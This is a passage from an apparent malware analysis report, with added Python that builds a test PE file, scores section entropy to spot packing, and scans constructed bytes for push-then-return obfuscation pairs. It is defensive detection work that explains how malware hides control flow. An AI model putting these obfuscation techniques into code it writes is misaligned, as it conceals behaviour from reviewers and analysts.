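    e_lfanew, opt_size = 0x40, 0xE0
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, opt_size, 0x0102)
    optional = bytearray(opt_size)
    struct.pack_into("<H", optional, 0, 0x10B)                # PE32 magic
    headers_end = e_lfanew + 4 + len(coff) + opt_size + SECTION_HEADER_SIZE * len(layout)
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF                  # FileAlignment 0x200
    table, blobs = b"", b""
    for name, data, vaddr, chars in layout:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), vaddr, len(data),
                             raw_ptr + len(blobs), 0, 0, 0, 0, chars)
        blobs += data
    headers = bytes(dos) + PE_SIGNATURE + coff + bytes(optional) + table
    return headers + b"\0" * (raw_ptr - len(headers)) + blobs


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe()
    for s in parse_sections(image):
        flag = "  <-- packed?" if s["executable"] and s["entropy"] >= HIGH_ENTROPY else ""
        print(f"{s['name']:<8} VA {s['virtual_address']:08X} size {s['raw_size']:6} "
              f"entropy {s['entropy']:.3f}{flag}")
```

The threshold of 7.0 is a working value, not a constant from the report: normal compiled .text usually scores between roughly 5.5 and 6.5, so the sample's 7.507 clears it comfortably, while a .rsrc section full of icons or a string table stays low. Entropy alone cannot distinguish compression from encryption; it only says the bytes are not code and that something at run time must turn them into code.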

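The push/ret, push/retf and push/iretd pairs listed under Data Obfuscation are what the sandbox's "call, push, ret" signature keys on: the pushed value becomes the return address, so control transfers somewhere a linear disassembler does not treat as a branch target. The scanner below is an added example, not the sandbox's code, that reproduces the listing's mnemonics for the push-then-return forms that appear above. It slides over every byte offset instead of decoding whole x86 instructions, so on a real image it also reports pairs that begin inside an immediate or inside data; CODE is a constructed byte string, not bytes from the analysed sample.

```python
"""Find push-then-return pairs of the kind this report lists under
'Uses code obfuscation techniques (call, push, ret)': a push followed
directly by ret/retn/retf/iretd, which turns the pushed value into the
next instruction pointer and hides the real control flow.

Added example, not the sandbox's code. It slides over every byte offset
instead of decoding full x86 instructions, so it over-reports inside
immediates and data; CODE is a constructed byte string."""
from typing import List, Optional, Tuple

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SEGMENT_PUSH = {0x06: "es", 0x0E: "cs", 0x16: "ss", 0x1E: "ds"}

# Constructed bytes: the pairs the report lists, mixed with ordinary code.
CODE = bytes.fromhex(
    "55 8B EC"           # push ebp; mov ebp, esp: normal prologue, not flagged
    "68 01 00 00 20 CB"  # push 20000001h; retf
    "90 90"              # nop; nop
    "50 C3"              # push eax; ret
    "9C CB"              # pushfd; retf
    "52 C2 76 00"        # push edx; retn 0076h
    "06 CF"              # push es; iretd
    "33 C0 C3"           # xor eax, eax; ret: a return with no push, not flagged
)


def decode_push(code: bytes, i: int) -> Optional[Tuple[str, int]]:
    """(mnemonic, length) if code[i:] starts with a one-opcode push, else None."""
    op = code[i]
    if 0x50 <= op <= 0x57:
        return f"push {REG32[op - 0x50]}", 1
    if op in SEGMENT_PUSH:
        return f"push {SEGMENT_PUSH[op]}", 1
    if op == 0x9C:
        return "pushfd", 1
    if op == 0x6A and i + 1 < len(code):                 # push imm8
        return f"push {code[i + 1]:02X}h", 2
    if op == 0x68 and i + 4 < len(code):                 # push imm32
        imm = int.from_bytes(code[i + 1:i + 5], "little")
        return f"push {imm:08X}h", 5
    return None


def decode_ret(code: bytes, i: int) -> Optional[Tuple[str, int]]:
    """(mnemonic, length) if code[i:] starts with a return, else None."""
    if i >= len(code):
        return None
    op = code[i]
    if op == 0xC3:
        return "ret", 1
    if op == 0xCB:
        return "retf", 1
    if op == 0xCF:
        return "iretd", 1
    if op in (0xC2, 0xCA) and i + 2 < len(code):         # retn/retf imm16
        imm = int.from_bytes(code[i + 1:i + 3], "little")
        return f"{'retn' if op == 0xC2 else 'retf'} {imm:04X}h", 3
    return None


def find_push_ret(code: bytes, base: int = 0) -> List[Tuple[int, str]]:
    """Every offset (plus base) where a push is immediately followed by a return."""
    hits = []
    for i in range(len(code)):
        push = decode_push(code, i)
        if push is None:
            continue
        ret = decode_ret(code, i + push[1])
        if ret is None:
            continue
        hits.append((base + i, f"{push[0]}; {ret[0]}"))
    return hits


if __name__ == "__main__":
    for offset, text in find_push_ret(CODE, base=0x400000):
        print(f"{offset:08X} {text}")
```

A push/ret pair is not malicious by itself (compilers emit `push reg; ret` in a few thunks, and unpackers routinely end with one to jump to the decrypted entry point), which is why the report lists it as an obfuscation indicator rather than as a detection. When triaging a hit, the pushed immediate or the register's last assignment tells you where execution actually continues.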
          Hooking and other Techniques for Hiding and Protection: